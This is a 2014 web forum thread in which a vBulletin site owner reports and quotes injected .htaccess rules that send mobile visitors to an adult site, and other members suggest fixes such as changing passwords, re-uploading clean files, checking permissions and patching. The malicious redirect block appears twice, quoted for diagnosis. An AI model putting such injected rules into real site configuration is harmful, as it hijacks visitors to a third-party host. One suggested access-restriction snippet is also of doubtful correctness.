PDA

View Full Version : htaccess hacked :(


viper357
02-27-2014, 12:03 PM
Was doing some SEO work today and noticed this at the bottom of my htaccess file :(

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cell phone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew |cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi |keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap |sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302]
So I guess my htaccess file has been hacked, easy enough to fix I suppose by just deleting that, but what can I do to prevent it from happening again? How do I protect my htaccess file from being tampered with?

ForceHSS
02-27-2014, 12:05 PM
do you have a backup of what it used to be

ozzy47
02-27-2014, 12:08 PM
Looks like it to me, seems like if you go to the site with a mobile devise, it redirects you to a sex site.

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

viper357
02-27-2014, 12:30 PM
do you have a backup of what it used to beThe rest of the file was fine, this code was just added to the bottom of it.

Looks like it to me, seems like if you go to the site with a mobile devise, it redirects you to a sex site.

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.Thanks, I'll change the FTP and cpanel passwords.

--------------- Added 1393507956 at 1393507956 ---------------

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.Thinking about that now, if they've gained access to my htaccess file then they would have probably had access to my whole server/account. Could they have added this code to any other files?

ozzy47
02-27-2014, 12:42 PM
Possibly, best thing to do is download a fresh copy of your vB, same version you are running, and upload the files to the server. You should do it for all mods installed as well.

RichieBoy67
02-27-2014, 12:46 PM
File permissions could have also been wrong giving anyone access to it. Check your file permissions and see if anything else has been impacted. Check out your webmastertools account as well under the security tab and see if it lists anything.

Most directories should be chmod 755 except for those that need write access, most files should be set at chmod 644 depending on your server.

TheLastSuperman
02-27-2014, 12:47 PM
Ahh I ran into this the other day as well when working on a site and it had to vulnerabilities... it still had vBSEO installed and had the /install/ folder on the server so be sure to switch vBSEO to DBSEO OR Remove it entirely and rewrite the urls AND/OR delete the install folder if present on your server.

Code from the .htaccess I ran into:
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cell phone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew |cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi |keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap |sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302]

viper357
02-27-2014, 01:03 PM
Thanks everyone.

I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

TheLastSuperman
02-27-2014, 01:11 PM
Thanks everyone.

I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

Is your forum updated to 4.2.1/4.2.2 OR if a slightly older version is it patched? Make sure it's patched at least, if not they may have gotten in that way.

viper357
02-27-2014, 01:49 PM
I'm on 3.8.5

I know there's updates to vb3 but I've made loads of template edits so an upgrade means losing all of those, I need to find time to update.

RichieBoy67
02-27-2014, 02:19 PM
I've seen people who had it set wide open accidentally. If that is the only file edited than I would check that first.

Simon Lloyd
02-27-2014, 08:44 PM
You could also add rules to it to prevent it being opened by anyone except the person with the correct ip and or username :) <Files "*">
Order deny, allow
Deny from all
Allow from 128.252.135.
Allow from .mydomain.com
Allow from host.mydomain.com
</Files>
put this in your .htaccess that is above /public_html change the ip address to yours and the domain names (host,mydomain.com would be the name of your server like for instance vborg.vbulletin.org if the name of .orgs server was set out like that).

With that only you and your server would have access to the files :), if you mess it up and you are on vps then only your hosts will be able to fix it so be careful.